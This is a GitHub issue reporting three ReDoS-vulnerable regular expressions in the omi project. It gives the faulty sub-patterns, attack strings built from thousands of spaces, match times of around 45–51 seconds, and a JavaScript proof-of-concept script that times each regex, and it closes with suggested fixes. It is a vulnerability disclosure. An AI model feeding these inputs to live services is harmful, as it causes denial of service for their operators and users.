Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerable Regular Expressions in omi #571

Open
yetingli opened this issue Sep 14, 2020 · 0 comments
Open

Vulnerable Regular Expressions in omi #571

yetingli opened this issue Sep 14, 2020 · 0 comments

Comments

@yetingli
Copy link

Type of Issue
Potential Regex Denial of Service (ReDoS)

Description
Here are three regular expressions with ReDos vulnerabilities, as shown below.

  1. regex1 = /( +)[^:]+::/ location
    The ReDOS vulnerability of the regex is mainly due to the sub-pattern ( +)[^:]+ and can be exploited with the following string " " * 5000
    It took 44.0 seconds for regex1 to match the malicious string
  2. regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/ location
    The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s+[\s\S]*?\s+ and can be exploited with the following string "OBTW" + " " * 5000
    It took 44.6 seconds for regex2 to match the malicious string
  3. regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/ location1 location2
    The ReDOS vulnerability of the regex is mainly due to the sub-pattern [ \t]*(.+?)[ \t]* and can be exploited with the following string "#" + " " * 5000
    It took 51.4 seconds for regex3 to match the malicious string

I prepared a script that showcases the execution times of the vulnerable regexes as follows.

// When attack_str.length=5000 , it took 44.0 seconds
regex1 = /( +)[^:]+::/;
var attack_str = " ";
console.log("regex1: "+regex1)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex1.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}



//When attack_str.length=5000 , it took 44.6 seconds
regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/;
var attack_str = "OBTW";
console.log("regex2: "+regex2)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex2.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}

// When attack_str.length=5000 , it took 51.4 seconds
regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/;
var attack_str = "#";
console.log("regex3: "+regex3)
for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length%100==0){
        var time = Date.now();
        regex3.test(attack_str);
        var run_time = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
    }
}

I am willing to suggest that you limit the input length, modify these regexes or replace these regexes with other codes.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@yetingli